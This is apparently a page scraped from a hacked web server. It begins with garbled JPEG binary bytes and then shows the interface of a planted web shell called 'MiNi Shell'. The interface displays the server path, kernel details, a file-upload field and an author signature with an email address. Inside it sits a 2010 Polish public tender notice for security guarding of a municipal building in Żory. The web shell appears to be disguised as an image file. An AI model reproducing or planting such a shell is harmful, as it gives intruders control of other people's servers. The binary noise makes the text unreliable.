JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/385004-N-2010.html

<p class="kh_header"><b>Żory: Ochrona obiektu i mienia budynku  przy ul. Wodzisławskiej 1 w Żorach w 2011r. zgodnie z zakresem obowiązków i regulaminem co stanowi załącznik nr 1 i 2 do projektu umowy.</b><br>
<b>Numer ogłoszenia: 385004 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Miejskich , ul. Wodzisławska 5, 44-240 Żory, woj. śląskie, tel. 032 4356464, faks 032 4356344.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbmzory.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona obiektu i mienia budynku  przy ul. Wodzisławskiej 1 w Żorach w 2011r. zgodnie z zakresem obowiązków i regulaminem co stanowi załącznik nr 1 i 2 do projektu umowy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ochrona obiektu i mienia budynku  przy ul. Wodzisławskiej 1 w Żorach w 2011r. zgodnie z zakresem obowiązków i regulaminem co stanowi załącznik nr 1 i 2 do projektu umowy.
Szczegółowy opis przedmiotu zamówienia: 
1) Przedmiotem zamówienia jest ochrona obiektu  przy ul. Wodzisławskiej 1 w Żorach w godzinach od 6.00-22.00  zgodnie z zakresem obowiązków i regulaminem co stanowi załącznik nr 1 i 2 do projektu umowy.

ZAKRES OBOWIĄZKÓW
Pracownika ochrony obiektu - ul. Wodzisławska 1
Celem ochrony obiektu jest nie dopuszczenie do:
zniszczenia oraz dewastacji obiektu i mienia na posesji ul. Wodzisławska 1,
dokonania włamania do pomieszczeń i w związku z tym do pracownika ochrony wykonującego swoje zadania w czasie zgodnym z umową dotyczącą ochrony należy:
Stałe dozorowanie obiektu w wyznaczonych godzinach, tj.: od poniedziałku do piątku w godzinach od 6:00  do 22:00 i w sobotę w godzinach od 6:00 do 17: 00.
Od poniedziałku do piątku wyłączanie o godzinie 6:00 systemu alarmowego i włączanie go o godzinie 22:00, w soboty wyłączanie o godzinie 6:00 systemu alarmowego i włączanie go o godzinie 17:00, natomiast w niedziele system alarmowy będzie włączony cały czas aż do poniedziałku do godziny 6:00 rano.
Patrolowanie terenu całego obiektu, nie mniej niż 4 x w ciągu zmiany (nie rzadziej niż co 2 godziny, odnotowane w książce służby).
W razie zagrożenia powiadomienie służb porządkowych.
Kontrolowanie ruchu osobowego ze stosownym odnotowaniem tej czynności w książce służby, na podstawie regulaminu stanowiącego załącznik do zakresu obowiązków.
Codzienne wydawanie (o godz. 15:00) kluczy sprzątaczkom obsługującym Urząd Skarbowy  i przejmowanie kluczy po zakończeniu sprzątania.
Codzienne zamykanie w godzinach wieczornych ( 20:00 - 21:00; w zależności od zakończenia pracy najemców lokali) drzwi na pietrach II i III pomiędzy klatką schodową a korytarzem oraz głównych drzwi wejściowych do lokali użytkowych, Poczty i Urzędu Skarbowego oraz gabinetów lekarskich, a otwieranie wejść w godzinach rannych (godz. 6:00).
Codzienne zamykanie o godz. 21:30 kraty zabudowanej w przejściu - wejście do obiektu od strony parkingu z ul. Wodzisławskiej i otwieranie kraty w godzinach rannych (godz. 6:00).
Włączanie oświetlenia wejść głównych do obiektu w godzinach wieczornych i wyłączenie w momencie zamknięcia obiektu (nie dotyczy latarni na placu przy budynku - podłączone są do sieci miejskiej, włączają się automatycznie).
Kontrolowanie oświetlenia korytarzy komunikacyjnych w godzinach wieczornych i gaszenie zbędnego oświetlenia.
Zgłaszanie służbo konserwatorskim ewentualnych awarii instalacji elektrycznych, wod.-kan., centralnego ogrzewania, windy i innych powstałych na terenie obiektu.
Ścisłe realizowanie bieżących zadań uzgodnionych z oferentem przekazywanych przez administrację ZBM - zadania te winny być odnotowane w książce służby.
Przestrzeganie zachowania tajemnicy służbowej w kwestii sposobów zabezpieczenia technicznego i fizycznego pod groźbą odpowiedzialności cywilno - prawnej.
Podejmowanie wszystkich innych czynności dla podniesienia skutecznej ochrony.
REGULAMIN
Dotyczy: wejścia do lokali użytkowych II i III piętro budynku przy ul. Wodzisławskiej 1, po godzinie 20:30
1)Drzwi wejściowe do budynku przy ul. Wodzisławskiej 1 w części, gdzie znajdują się lokale użytkowe zamykane są w dni robocze o godz. 20:30 , a otwierane o godz. 6:00 rano.
2)Drzwi znajdujące się na piętrach II i III pomiędzy klatką schodową, a korytarzem są również zamykane w godzinach określonych w pkt.1.
3)Najemcy lokali użytkowych zobowiązani są do opuszczenia i zamykania lokali użytkowych w budynku przy ul. Wodzisławskiej 1 do godziny 20:30. Obiekt zostaje całkowicie zamknięty po w/w godzinie i o godzinie 22:00 zostaje zabezpieczony systemem alarmowym bez fizycznego dozorowania.
Oferta winna obejmować całość zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każda oferta musi być zabezpieczona wadium w wysokości  850,00 złotych 
(słownie: osiemset  pięćdziesiąt złotych  00/100) Gwarancja ubezpieczeniowa, gwarancja bankowa  i poręczenie złożone jako zabezpieczenie wadium musi posiadać okres ważności nie krótszy niż okres związania ofertą, pod rygorem wykluczenia Wykonawcy z postępowania.
2. Wadium może być wnoszone w jednej lub kilku formach określonych w art. 45 
ust. 6 ustawy pzp.
3. Oferta nie zabezpieczona akceptowalną formą wadium zostanie odrzucona z postępowania bez rozpatrywania.
Informacje dodatkowe:
1) wadium musi być wniesione przed upływem terminu składania ofert. W przypadku wnoszenia wadium w formie pieniężnej za termin wniesienia wadium przyjmuje się datę wpływu środków na rachunek bankowy Zamawiającego,
2) wadium w formie pieniężnej należy wnieść  przelewem na konto w ING Bank Śląski oddział Żory,  Nr rachunku  54 105016761000000402705180
3) oryginał wadium wniesionego w innej formie niż pieniężna można zdeponować w dziale Zamówień Publicznych w pokoju nr 20 ZBM  lub w odrębnej kopercie dołączyć do oferty, 
4) wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ustawy pzp. W przypadku wadium wniesionego w pieniądzu zwrot nastąpi przelewem na rachunek bankowy wskazany w ofercie przez Wykonawcę, a wniesione w innej formie - zostanie zwrócone zgodnie z zapisem, np. w gwarancji,
5) wadium wniesione w pieniądzu zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę,
6) Zamawiający żąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie art. 46 ust.1, jeżeli w wyniku  rozstrzygnięcia odwołania,jego oferta została wybrana jako najkorzystniejsza. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
7) Zamawiający zatrzymuje wadium wraz z odsetkami jeżeli Wykonawca :
1) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy pzp, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy pzp lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
     2) którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
    określonych w ofercie,
 b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
       c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8) Wadium wniesione w innej formie niż pieniądz, winno zabezpieczać roszczenia     Zamawiającego w sytuacjach opisanych w pkcie 7.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek  za spełniony,jeśli Wykonawca przedłoży aktualną  koncesję na prowadzenie działalności związanej z fizyczną ochroną mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykonał usługi w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie co najmniej dwie usługi polegające na ochronie budynków użyteczności  publicznej o wartości nie mniejszej niż 18.000 zł (osiemnaście tysięcy złotych) brutto każda z podaniem ich wartości, przedmiotu i dat wykonania  i odbiorców oraz  załączeniem dokumentu potwierdzającego, że  usługi  te zostały wykonane  należycie,( lub są wykonywane należycie- w przypadku świadczeń okresowych lub ciągłych).Ocena spełnienia ww. warunku nastąpi w oparciu o dołączone do oferty oświadczenia i dokumenty, na zasadzie spełnia,nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje żadnych wymagań do warunku których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.Weryfikacja  spełnienia warunku odbędzie się w oparciu  o oświadczenie  o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek  za spełniony,jeśli Wykonawca wskaże osoby, które będą uczestniczyć  w wykonaniu zamówienia, w szczególności odpowiedzialne za świadczenie usług, wraz z informacją o posiadającym przeszkoleniu stanowiskowym  pracowników  przewidzianych do pełnienia służby ochrony na budynku przy ul.Wodzisławskiej 1,oraz  informacją o podstawie do dysponowania tymi osobami.
Wykonawca musi mieć do dyspozycji odpowiednio przeszkolone( licencja nie jest wymagana), nie karane osoby w celu obsadzenia stanowisk niezbędnych do realizacji przedmiotu zamówienia.Ocena spełnienia ww. warunku nastąpi w oparciu o dołączone do oferty oświadczenia i dokumenty, na zasadzie spełnia,nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna warunek  za spełniony, jeśli Wykonawca posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej
 z przedmiotem zamówienia z sumą gwarancyjną nie mniejszą niż  15.000,00 zł.,w przypadku braku opłaconej polisy inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności w zakresie prowadzonej działalności  związanej  z przedmiotem zamówienia.Ocena spełnienia ww. warunku nastąpi w oparciu o dołączone do oferty oświadczenia i dokumenty, na zasadzie spełnia,nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie -  zobowiązanie innych podmiotów  do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia lub inny dokument potwierdzający ten fakt- jeżeli Wykonawca polega na zasobach innych podmiotów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przyczyna/okoliczności. Zmiana przepisów o podatku od towarów i usług. 
Skutek- zmiana w umowie/aneks. Zmniejszenie/ zwiększenie wynagrodzenia brutto wykonawcy; kwota zostanie zmieniona zgodnie ze zmianą stawki VAT.
Przyczyna/okoliczności. Przekształcenie firmy,zmiana nazwy firmy.
Skutek- zmiana w umowie/aneks. Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbm.zory.bip.net.pl menu przedmiotowe/Przetargi/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Miejskich,ul. Wodzisławska 5,44-240 Żory, pokój nr 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2010 godzina 09:00, miejsce: Zarząd Budynków Miejskich,ul. Wodzisławska 5,44-240 Żory,SEKRETARIAT
 pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com